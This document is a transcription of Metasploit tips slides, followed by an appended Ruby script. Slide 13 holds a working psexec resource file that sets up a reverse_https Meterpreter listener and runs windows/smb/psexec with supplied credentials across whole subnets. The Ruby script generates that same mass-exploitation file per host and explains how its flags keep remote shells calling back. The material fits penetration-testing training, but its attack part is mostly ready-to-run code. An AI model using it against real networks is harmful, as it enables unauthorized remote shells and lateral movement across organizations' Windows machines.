
Metasploit Magic: the dark corners of the framework



  1. Metasploit Magic: a little sleight of hand
  2. But first...
  3. Installing Metasploit: svn co https://metasploit.com/svn/trunk msf
  4. not... here
  5. ESPECIALLY not here
  6. it is a SYN
  7. SRSLY!
  8. here is ok ;-)
  9. and remember... this isn't the only place you can install it...
  10. Directory structure (top of the checkout):
      HACKING, README, documentation
      msfconsole, msfcli, msfgui, msfd, msfrpc, msfrpcd, msfupdate
      msfencode, msfpayload, msfelfscan, msfmachscan, msfpescan, msfopcode
      armitage, psexec.rc
      data, external, lib, modules, plugins, scripts, tools, bins
  11. ~/.msf3/
      • history, logs, loot
      • msfconsole.rc: YOUR SETTINGS
      • modules: YOUR MODULES
  12. Resource files
      • run line by line, like a script
      • can understand Ruby (<ruby> ... </ruby> blocks)
      • work for meterpreter sessions now!
      ./msfconsole -r psexec.rc
      msf> resource psexec.rc
  13. psexec scanner (psexec.rc):
      # one shared handler, started once as a background job
      use multi/handler
      setg PAYLOAD windows/meterpreter/reverse_https
      setg LHOST 192.168.1.100
      setg LPORT 443
      set ExitOnSession false
      exploit -j -z

      # psexec with its own handler disabled, so every session lands on the job above
      use windows/smb/psexec
      set SMBUser AdminBob
      set SMBPass ThisPasswordSucks
      set SMBDomain .
      set DisablePayloadHandler true

      <ruby>
      require 'rex/socket/range_walker'
      rhosts = '10.10.10.0/24,10.10.14.0/24'
      iplist = Rex::Socket::RangeWalker.new(rhosts)
      iplist.each do |rhost|
        self.run_single("set RHOST #{rhost}")
        self.run_single("exploit -j -z")
      end
      </ruby>
  17. magic: user .*psexec
  18. other fun...
      • script
      • color = false
      • screen
  19. meterpreter> guid
      • twitter.com/mubix
      • mubix[hak5.org]
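Slide 13's psexec scanner leans on Rex::Socket::RangeWalker and run_single, which only exist inside msfconsole, so the loop runs blind: you see which hosts get hit only as the jobs fire. The script below is an added example (not from the slides or the framework) that builds a resource file with the same shape but expands the target list in plain Ruby first, so the exact per-host command list can be reviewed before it is fed to msfconsole. The stdlib `ipaddr` stands in for RangeWalker; the function names, sample targets and sample credentials are this example's own assumptions.

```ruby
# Added example (not from mubix's slides): build a resource file with the same
# shape as slide 13's psexec scanner, but expand the target list in plain Ruby
# so the exact per-host command list can be reviewed before it is fed to
# msfconsole. Rex::Socket::RangeWalker and run_single exist only inside the
# framework, so the stdlib 'ipaddr' stands in for the range expansion here.
# Function names, the sample targets and the sample credentials are this
# example's own assumptions.
require 'ipaddr'

# Expand a comma-separated target spec into individual IPv4 addresses.
# Accepts single hosts, CIDR blocks and first-last ranges, e.g.
# "10.10.10.0/24,10.10.14.5,10.10.15.1-10.10.15.20". CIDR blocks are expanded
# in full (network and broadcast addresses included); trim them if you do not
# want to knock on .0 and .255.
def expand_targets(spec)
  spec.split(',').map(&:strip).reject(&:empty?).flat_map do |entry|
    if entry.include?('-')
      first, last = entry.split('-', 2).map { |s| IPAddr.new(s.strip) }
      raise ArgumentError, "backwards range: #{entry}" if last < first
      (first..last).map(&:to_s)
    else
      # a bare host is a one-element range; a CIDR block is the whole block
      IPAddr.new(entry).to_range.map(&:to_s)
    end
  end.uniq
end

# Produce the resource file text. The structure mirrors the slide: a single
# reverse_https handler is started once as a background job, then
# windows/smb/psexec is fired against every host with its own payload handler
# disabled, so each Meterpreter session comes back to the shared listener.
def build_psexec_rc(targets, user:, pass:, lhost:, domain: '.', lport: 443)
  lines = [
    'use multi/handler',
    'setg PAYLOAD windows/meterpreter/reverse_https',
    "setg LHOST #{lhost}",
    "setg LPORT #{lport}",
    'set ExitOnSession false',          # keep listening after the first session
    'exploit -j -z',                     # run as a job, do not interact
    '',
    'use windows/smb/psexec',
    "set SMBUser #{user}",
    "set SMBPass #{pass}",
    "set SMBDomain #{domain}",
    'set DisablePayloadHandler true',   # the job above already owns LPORT
  ]
  expand_targets(targets).each do |rhost|
    lines << "set RHOST #{rhost}"
    lines << 'exploit -j -z'
  end
  lines.join("\n") + "\n"
end

if __FILE__ == $0
  # Constructed sample input; write the result to psexec.rc and load it with
  # "./msfconsole -r psexec.rc" or "msf> resource psexec.rc".
  puts build_psexec_rc('10.10.10.0/30,10.10.14.5-10.10.14.7',
                       user: 'AdminBob', pass: 'ThisPasswordSucks',
                       lhost: '192.168.1.100')
end
```

Pre-expanding the list also makes the two flags on the slide easy to check against the output: there is exactly one `exploit -j -z` under multi/handler with `ExitOnSession false` (otherwise the listener would die after the first callback), and every psexec invocation runs with `DisablePayloadHandler true` (otherwise each one would try to bind LPORT 443 again and fail).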
